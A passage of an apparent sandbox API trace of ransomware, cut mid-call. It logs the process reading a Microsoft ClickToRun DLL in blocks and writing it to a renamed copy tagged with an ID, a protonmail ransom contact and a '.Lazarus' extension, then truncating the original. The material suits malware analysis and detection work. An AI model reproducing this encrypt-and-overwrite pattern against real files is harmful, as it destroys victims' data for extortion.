0x6cdf0 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0091.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0091.089] AreFileApisANSI () returned 1 [0091.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0091.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0091.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0091.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.089] AreFileApisANSI () returned 1 [0091.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0091.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0091.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0091.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.089] GetFileType (hFile=0x33c) returned 0x1 [0091.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.089] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.090] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.090] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.090] CloseHandle (hObject=0x33c) returned 1 [0091.090] AreFileApisANSI () returned 1 [0091.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0091.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0091.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0091.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.090] GetFileType (hFile=0x33c) returned 0x1 [0091.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.091] CloseHandle (hObject=0x33c) returned 1 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0091.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0091.092] AreFileApisANSI () returned 1 [0091.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0091.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0091.092] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.092] AreFileApisANSI () returned 1 [0091.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0091.093] GetLastError () returned 0x0 [0091.093] SetLastError (dwErrCode=0x0) [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0091.093] GetLastError () returned 0x0 [0091.093] SetLastError (dwErrCode=0x0) [0091.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5fb08 [0091.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.093] AreFileApisANSI () returned 1 [0091.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fb08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0091.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x4e568 [0091.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fb08, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0091.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.094] GetFileType (hFile=0x33c) returned 0x1 [0091.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0091.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0091.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.094] AreFileApisANSI () returned 1 [0091.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0091.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0091.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0091.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.094] GetFileType (hFile=0x360) returned 0x1 [0091.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0091.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0091.094] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0091.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0091.095] GetLastError () returned 0x0 [0091.095] SetLastError (dwErrCode=0x0) [0091.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0091.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0091.095] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0091.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0091.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0091.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] GetLastError () returned 0x0 [0091.097] SetLastError (dwErrCode=0x0) [0091.097] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.098] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.099] GetLastError () returned 0x0 [0091.099] SetLastError (dwErrCode=0x0) [0091.099] GetLastError () returned 0x0 [0091.099] SetLastError (dwErrCode=0x0) [0091.099] GetLastError () returned 0x0 [0091.099] SetLastError (dwErrCode=0x0) [0091.099] GetLastError () returned 0x0 [0091.099] SetLastError (dwErrCode=0x0) [0091.099] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.099] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.099] GetLastError () returned 0x0 [0091.100] SetLastError (dwErrCode=0x0) [0091.100] GetLastError () returned 0x0 [0091.100] SetLastError (dwErrCode=0x0) [0091.100] GetLastError () returned 0x0 [0091.100] SetLastError (dwErrCode=0x0) [0091.100] GetLastError () returned 0x0 [0091.100] SetLastError (dwErrCode=0x0) [0091.100] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.100] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.100] GetLastError () returned 0x0 [0091.100] SetLastError (dwErrCode=0x0) [0091.101] GetLastError () returned 0x0 [0091.101] SetLastError (dwErrCode=0x0) [0091.101] GetLastError () returned 0x0 [0091.101] SetLastError (dwErrCode=0x0) [0091.101] GetLastError () returned 0x0 [0091.101] SetLastError (dwErrCode=0x0) [0091.101] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0xac0, lpOverlapped=0x0) returned 1 [0091.101] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.101] GetLastError () returned 0x0 [0091.101] SetLastError (dwErrCode=0x0) [0091.101] GetLastError () returned 0x0 [0091.101] SetLastError (dwErrCode=0x0) [0091.102] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0091.102] GetLastError () returned 0x0 [0091.102] SetLastError (dwErrCode=0x0) [0091.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0091.102] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0xac0, lpOverlapped=0x0) returned 1 [0091.102] GetLastError () returned 0x0 [0091.102] SetLastError (dwErrCode=0x0) [0091.102] GetLastError () returned 0x0 [0091.102] SetLastError (dwErrCode=0x0) [0091.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0091.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0091.103] CloseHandle (hObject=0x33c) returned 1 [0091.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0091.104] CloseHandle (hObject=0x360) returned 1 [0091.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0091.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0091.104] AreFileApisANSI () returned 1 [0091.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0091.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0091.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0091.105] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.105] GetFileType (hFile=0x360) returned 0x1 [0091.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0091.106] GetLastError () returned 0xb7 [0091.106] SetLastError (dwErrCode=0xb7) [0091.106] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0091.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0091.107] CloseHandle (hObject=0x360) returned 1 [0091.107] AreFileApisANSI () returned 1 [0091.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0091.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0091.107] MultiByteToWideChar (in: CodePage=0x0, 